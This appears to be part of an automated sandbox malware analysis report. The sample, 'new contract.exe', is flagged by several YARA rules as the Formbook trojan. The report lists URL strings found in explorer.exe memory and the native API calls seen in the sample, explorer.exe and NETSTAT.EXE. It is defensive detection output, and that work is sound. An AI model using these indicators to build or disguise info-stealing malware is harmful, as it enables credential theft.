          Source: explorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000003.00000000.1743468048.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1744290511.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4130757516.0000000003700000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000003.00000000.1752045440.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.0000000009701000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000003.00000000.1752045440.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.0000000009701000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C557000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

          E-Banking Fraud

          Source: Yara match | File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4142928612.000000000E4FB000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: new contract.exe PID: 7424, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: new contract.exe PID: 7648, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 7732, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041A320 NtCreateFile, | 2_2_0041A320
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041A3D0 NtReadFile, | 2_2_0041A3D0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041A450 NtClose, | 2_2_0041A450
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041A500 NtAllocateVirtualMemory, | 2_2_0041A500
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041A2DA NtCreateFile, | 2_2_0041A2DA
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_0041A44A NtClose, | 2_2_0041A44A
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662B60 NtClose,LdrInitializeThunk, | 2_2_01662B60
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 2_2_01662BF0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662AD0 NtReadFile,LdrInitializeThunk, | 2_2_01662AD0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662D30 NtUnmapViewOfSection,LdrInitializeThunk, | 2_2_01662D30
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662D10 NtMapViewOfSection,LdrInitializeThunk, | 2_2_01662D10
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662DF0 NtQuerySystemInformation,LdrInitializeThunk, | 2_2_01662DF0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662DD0 NtDelayExecution,LdrInitializeThunk, | 2_2_01662DD0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662C70 NtFreeVirtualMemory,LdrInitializeThunk, | 2_2_01662C70
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662CA0 NtQueryInformationToken,LdrInitializeThunk, | 2_2_01662CA0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662F30 NtCreateSection,LdrInitializeThunk, | 2_2_01662F30
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662FE0 NtCreateFile,LdrInitializeThunk, | 2_2_01662FE0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662FB0 NtResumeThread,LdrInitializeThunk, | 2_2_01662FB0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662F90 NtProtectVirtualMemory,LdrInitializeThunk, | 2_2_01662F90
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 2_2_01662EA0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662E80 NtReadVirtualMemory,LdrInitializeThunk, | 2_2_01662E80
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01664340 NtSetContextThread, | 2_2_01664340
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01664650 NtSuspendThread, | 2_2_01664650
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662BE0 NtQueryValueKey, | 2_2_01662BE0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662BA0 NtEnumerateValueKey, | 2_2_01662BA0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662B80 NtQueryInformationFile, | 2_2_01662B80
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662AF0 NtWriteFile, | 2_2_01662AF0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662AB0 NtWaitForSingleObject, | 2_2_01662AB0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662D00 NtSetInformationFile, | 2_2_01662D00
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662DB0 NtEnumerateKey, | 2_2_01662DB0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662C60 NtCreateKey, | 2_2_01662C60
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662C00 NtQueryInformationProcess, | 2_2_01662C00
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662CF0 NtOpenProcess, | 2_2_01662CF0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662CC0 NtQueryVirtualMemory, | 2_2_01662CC0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662F60 NtCreateProcessEx, | 2_2_01662F60
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662FA0 NtQuerySection, | 2_2_01662FA0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662E30 NtWriteVirtualMemory, | 2_2_01662E30
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01662EE0 NtQueueApcThread, | 2_2_01662EE0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01663010 NtOpenDirectoryObject, | 2_2_01663010
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01663090 NtSetValueKey, | 2_2_01663090
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016635C0 NtCreateMutant, | 2_2_016635C0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_016639B0 NtGetContextThread, | 2_2_016639B0
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01663D70 NtOpenThread, | 2_2_01663D70
          Source: C:\Users\user\Desktop\new contract.exe | Code function: 2_2_01663D10 NtOpenProcessToken, | 2_2_01663D10
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E4E12 NtProtectVirtualMemory, | 3_2_0E4E4E12
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E3232 NtCreateFile, | 3_2_0E4E3232
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E4E4E0A NtProtectVirtualMemory, | 3_2_0E4E4E0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182B60 NtClose,LdrInitializeThunk, | 5_2_03182B60
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 5_2_03182BF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182BE0 NtQueryValueKey,LdrInitializeThunk, | 5_2_03182BE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182AD0 NtReadFile,LdrInitializeThunk, | 5_2_03182AD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182F30 NtCreateSection,LdrInitializeThunk, | 5_2_03182F30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182FE0 NtCreateFile,LdrInitializeThunk, | 5_2_03182FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, | 5_2_03182EA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182D10 NtMapViewOfSection,LdrInitializeThunk, | 5_2_03182D10
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182DD0 NtDelayExecution,LdrInitializeThunk, | 5_2_03182DD0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182DF0 NtQuerySystemInformation,LdrInitializeThunk, | 5_2_03182DF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182C70 NtFreeVirtualMemory,LdrInitializeThunk, | 5_2_03182C70
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182C60 NtCreateKey,LdrInitializeThunk, | 5_2_03182C60
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182CA0 NtQueryInformationToken,LdrInitializeThunk, | 5_2_03182CA0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_031835C0 NtCreateMutant,LdrInitializeThunk, | 5_2_031835C0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03184340 NtSetContextThread, | 5_2_03184340
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03184650 NtSuspendThread, | 5_2_03184650
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_03182B80 NtQueryInformationFile, | 5_2_03182B80
